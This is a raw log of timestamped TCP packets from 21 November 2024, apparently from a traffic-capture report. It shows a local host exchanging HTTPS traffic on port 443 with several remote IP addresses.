                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.500535965 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.556941986 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.568499088 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.582077026 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.582150936 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.582170010 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.585727930 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.585886955 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.585894108 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.598098040 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.598375082 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.598391056 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.606551886 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.607328892 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.607340097 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.619676113 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.619837999 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.619848967 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.634768009 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.634867907 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.634876013 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.646464109 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.646560907 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.646574974 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.675456047 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.675560951 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.675662041 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.675671101 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.676603079 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.682858944 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.685379982 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.685805082 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.685811996 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.695580959 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.696418047 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.696439981 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.744446993 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.770540953 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.774313927 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.774388075 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.774409056 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.784400940 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.784440994 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.784563065 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.784584999 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.785466909 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.791508913 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.799887896 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.800276041 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.800292969 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.808727980 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.808876038 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.808885098 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.808907986 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.808968067 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.814296007 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.825238943 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.825273037 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.825416088 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.825440884 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.825570107 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.836829901 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.846901894 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.846982002 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.847011089 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.857820988 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.857876062 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.857901096 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.857933044 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.858072042 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.868247032 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.878954887 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.879057884 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.879179001 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.879209995 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.879357100 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.889090061 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.898171902 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.898269892 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.898302078 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.908247948 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.908368111 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.908418894 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.908449888 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.908585072 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.918551922 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.925775051 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.925843000 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.925865889 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.934279919 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.934340954 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.934360981 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.943954945 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.944000006 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.944099903 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.944122076 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.944159985 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.944344997 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.952795029 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.953958035 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.953982115 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.961232901 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.961287022 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.961294889 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.966698885 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.967036963 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.967042923 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.972259045 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.972357988 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.972368956 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.977721930 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.977776051 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.977793932 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.985728025 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.985827923 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.985852003 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.989177942 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.989254951 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.989275932 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.994488001 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.994568110 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:20.994590044 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.003562927 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.003777981 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.003798962 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.015353918 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.015429020 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.015575886 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.015600920 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.015824080 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.018265963 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.025291920 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.025363922 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.025387049 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.025748014 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.025794983 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.026200056 CET44349729172.217.21.36192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.026273012 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.026326895 CET49729443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.499980927 CET49734443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.500030994 CET4434973449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.500092983 CET49734443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.504417896 CET49734443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.504434109 CET4434973449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.942919016 CET49738443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.942965984 CET443497382.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.943032980 CET49738443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.944554090 CET49738443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:21.944581032 CET443497382.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.730364084 CET49727443192.168.2.8172.217.21.36
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.796513081 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.796555042 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.796731949 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.797296047 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.797312975 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.972233057 CET4434973449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.972341061 CET49734443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.973486900 CET49734443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.973500013 CET4434973449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.976840019 CET49734443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:22.976859093 CET4434973449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.387185097 CET443497382.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.387372971 CET49738443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.408968925 CET49738443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.408993006 CET443497382.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.409274101 CET443497382.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.453152895 CET49738443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.503195047 CET49738443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.547326088 CET443497382.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.620821953 CET49705443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.620872974 CET4434970523.206.229.226192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.620913982 CET49705443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.622086048 CET49740443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.622139931 CET4434974023.206.229.226192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.622354984 CET49740443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.630887032 CET49740443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.630932093 CET4434974023.206.229.226192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.914228916 CET443497382.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.914302111 CET443497382.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.914407969 CET49738443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.914551973 CET49738443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.914577007 CET443497382.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.914700985 CET49738443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.914706945 CET443497382.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.959381104 CET49741443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.959414005 CET443497412.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.959489107 CET49741443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.959768057 CET49741443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:23.959784031 CET443497412.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.147547007 CET4434973449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.147609949 CET49734443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.147634029 CET4434973449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.147650003 CET4434973449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.147695065 CET49734443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.148422003 CET49734443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.148437023 CET4434973449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.423338890 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.423497915 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.423891068 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.423898935 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.425971031 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.425971031 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.425987959 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.426003933 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.426136017 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.426153898 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.426256895 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.426270962 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.878251076 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.878283024 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.878376961 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.878698111 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.878710032 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.975994110 CET4434974023.206.229.226192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:24.976072073 CET49740443192.168.2.823.206.229.226
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:25.351768017 CET443497412.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:25.351861954 CET49741443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:25.353432894 CET49741443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:25.353446007 CET443497412.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:25.353759050 CET443497412.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:25.355359077 CET49741443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:25.399333954 CET443497412.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:25.957952023 CET443497412.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:25.958026886 CET443497412.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:25.958138943 CET49741443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.118777037 CET49741443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.118815899 CET443497412.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.118829966 CET49741443192.168.2.82.16.229.162
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.118837118 CET443497412.16.229.162192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.122704983 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.122766972 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.122782946 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.122869968 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.124579906 CET49739443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.124591112 CET4434973949.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.290179014 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.290254116 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.290817976 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.290848970 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.292382956 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.292391062 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.292604923 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.292649984 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.292749882 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.292772055 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.293029070 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.293070078 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.293203115 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.293224096 CET4434974249.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.293235064 CET49742443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:26.293268919 CET4434974249.13.32.95192.168.2.8
